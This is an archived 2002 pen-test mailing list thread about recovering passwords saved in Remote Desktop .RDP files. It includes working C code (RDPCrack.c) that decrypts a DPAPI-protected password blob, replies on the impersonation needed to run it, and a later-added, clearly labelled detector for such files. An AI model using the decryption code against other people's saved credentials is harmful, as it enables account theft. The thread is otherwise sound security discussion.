RE: Saved Terminal Server Sessions

From: Michael Howard (mikehow@microsoft.com)
Date: 12/31/02


Date: Tue, 31 Dec 2002 11:31:34 -0800
From: "Michael Howard" <mikehow@microsoft.com>
To: "Nicolas RUFF" <nicolas.ruff@edelweb.fr>, "pen-test" <pen-test@securityfocus.com>

You will also need to load the user's profile; simply impersonating may
not work...

Cheers, Michael
Secure Windows Initiative
Writing Secure Code 2nd Edition
http://www.microsoft.com/mspress/books/5957.asp

-----Original Message-----
From: Nicolas RUFF [mailto:nicolas.ruff@edelweb.fr]
Sent: Tuesday, December 31, 2002 2:03 AM
To: pen-test

st0ff st0ff wrote:
> Hi all -
> Terminal Server Client and Remote Desktop Client
> offer to save the appropriate user credentials. A
> plaintext file is used for that, but the password is
> encrypted in there. Is there a tool available to crack
> this?

Hi,

I guess you are talking about ".RDP" files. The password is encrypted
using the standard CryptProtectData() API. You can use the code below
(from MSDN) to decrypt it; however, you will have to impersonate the
user somehow to make this code run, because the encryption key used is
derived from the user context (the Windows logon password I guess).

- Nicolas RUFF
-----------------------------------
Security Consultant @ EdelWeb
nicolas.ruff@edelweb.fr
-----------------------------------

//--------------------------------------------------------------------
// RDPCrack.c
//
// This is modified sample code from MSDN
// This code requires Windows 2000 or XP
// Don't forget to link CRYPT32.LIB
//

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#include <wincrypt.h>

void HandleError(char *s);

int main(void)
{
    DATA_BLOB DataOut;
    DATA_BLOB DataVerify;
    LPWSTR pDescrOut = NULL;
    BYTE *pbDataOutput;
    DWORD cbDataOutput;
    unsigned int data;
    unsigned int i;

    // Put encrypted password string here
    // (adjacent string literals are concatenated by the compiler)
    char szEncodedPwd[] =
        "01000000D08C9DDF0115D1118C7A00C04FC297EB01000000A5C6A9949D6D804898C5037"
        /* ... part of the sample value is missing in this copy of the post ... */
        "58017821C804EB2B1DB3897F7F31247CA55377379F1B05D69F2BDEAC5BE5BFD95E754F4A"
        "69D2301222C72AE2200200092E56C69F66E15913E13B821CA78BEA70DC8CA2F682EFE01E"
        "69B52E6218FE5FB5FAFF0DA7E17257748F1B35F0E3507D7A13146CBDFF6155FEE6B8CEF2"
        "F5CFF1E0D66D0B5D7C4234E07D23319BA1C6317C0CDAA9A80499DD4B57A66886A677E631"
        "744714000000257F2ED4678E73B1D0CF2338B471F6A507A7FE9F0";

    // String conversion: two hex digits per output byte
    cbDataOutput = (DWORD)(strlen(szEncodedPwd) / 2);
    pbDataOutput = (BYTE *)malloc(cbDataOutput + 1);
    if (pbDataOutput == NULL)
        HandleError("Not enough memory.");

    for (i = 0; i < cbDataOutput; i++) {
        // %2x reads at most two hex digits into an unsigned int
        if (sscanf(&szEncodedPwd[i + i], "%2x", &data) != 1)
            HandleError("Invalid hex string.");
        pbDataOutput[i] = (BYTE)data;
    }
    DataOut.pbData = pbDataOutput;
    DataOut.cbData = cbDataOutput;

    // Decryption
    if (CryptUnprotectData(
            &DataOut,     // [in] Input data
            &pDescrOut,   // (Optional) [out] Description string
            NULL,         // (Optional) [in] Entropy (not used by MS)
            NULL,         // Reserved
            NULL,         // (Optional) PromptStruct
            0,            // Flags
            &DataVerify)) // [out] Output data
    {
        // The output is not guaranteed to be NUL-terminated, so bound
        // the print by the returned length (in WCHARs).
        wprintf(L"The decrypted data is: %.*s\n",
                (int)(DataVerify.cbData / sizeof(WCHAR)),
                (WCHAR *)DataVerify.pbData);
        wprintf(L"The description of the data was: %s\n", pDescrOut);
    }
    else
    {
        HandleError("Decryption error!");
    }

    LocalFree(pDescrOut);
    free(DataOut.pbData);
    LocalFree(DataVerify.pbData);
    return 0;
}

void HandleError(char *s)
{
    // Capture the error code before any other call can overwrite it
    DWORD dwErr = GetLastError();

    fprintf(stderr, "An error occurred in running the program. \n");
    fprintf(stderr, "%s\n", s);
    fprintf(stderr, "Error number %lx.\n", dwErr);
    fprintf(stderr, "Program terminating. \n");
    exit(1);
}

------------------------------------------------------------------------
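
Added example, not part of the original thread or of the MSDN sample: a portable C check that flags .RDP text containing a saved, DPAPI-protected password, so such files can be found and the stored credential cleared. It assumes the file has already been converted to single-byte text (the client may store it as UTF-16), that the password sits in the `password 51:b:` field, and it uses the first 20 bytes of the blob quoted in the post as the DPAPI header; the sample input is constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* DPAPI version 1 + provider GUID: the first 20 bytes of the blob in the post. */
static const char DPAPI_PREFIX[] = "01000000D08C9DDF0115D1118C7A00C04FC297EB";
static const char PWD_FIELD[] = "password 51:b:"; /* saved-password field */
/* Constructed sample input; the blob is a header plus filler, not a credential. */
static const char SAMPLE_RDP[] =
    "full address:s:host.example.test\r\n"
    "username:s:alice\r\n"
    "password 51:b:01000000D08C9DDF0115D1118C7A00C04FC297EB0100000000\r\n"
    "prompt for credentials:i:0\r\n";

/* Case-insensitive test that s starts with prefix. */
static int has_prefix_ci(const char *s, const char *prefix)
{
    for (; *prefix; s++, prefix++)
        if (toupper((unsigned char)*s) != toupper((unsigned char)*prefix))
            return 0;
    return 1;
}

/* Classify the line starting at `line` (ends at '\n' or NUL):
   0 = no saved password, 1 = DPAPI-protected password present,
   2 = password field present but not a well-formed DPAPI hex blob. */
int classify_rdp_line(const char *line)
{
    size_t n = 0;
    const char *val, *p;
    while (*line == ' ' || *line == '\t') line++;
    if (!has_prefix_ci(line, PWD_FIELD)) return 0;
    val = line + strlen(PWD_FIELD);
    while (isxdigit((unsigned char)val[n])) n++;
    for (p = val + n; *p && *p != '\n'; p++)   /* only whitespace may follow */
        if (!isspace((unsigned char)*p)) return 2;
    if (n == 0) return 0;                      /* empty field, nothing stored */
    return has_prefix_ci(val, DPAPI_PREFIX) ? 1 : 2;
}

/* Number of lines in the text that hold a DPAPI-protected password. */
int count_saved_passwords(const char *text)
{
    int hits = 0;
    while (*text) {
        if (classify_rdp_line(text) == 1) hits++;
        text += strcspn(text, "\n");
        if (*text) text++;
    }
    return hits;
}

int main(void) { printf("saved passwords: %d\n", count_saved_passwords(SAMPLE_RDP)); return 0; }
```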

----
This list is provided by the SecurityFocus Security Intelligence Alert
(SIA) Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please
see:
https://alerts.securityfocus.com/
----------------------------------------------------------------------------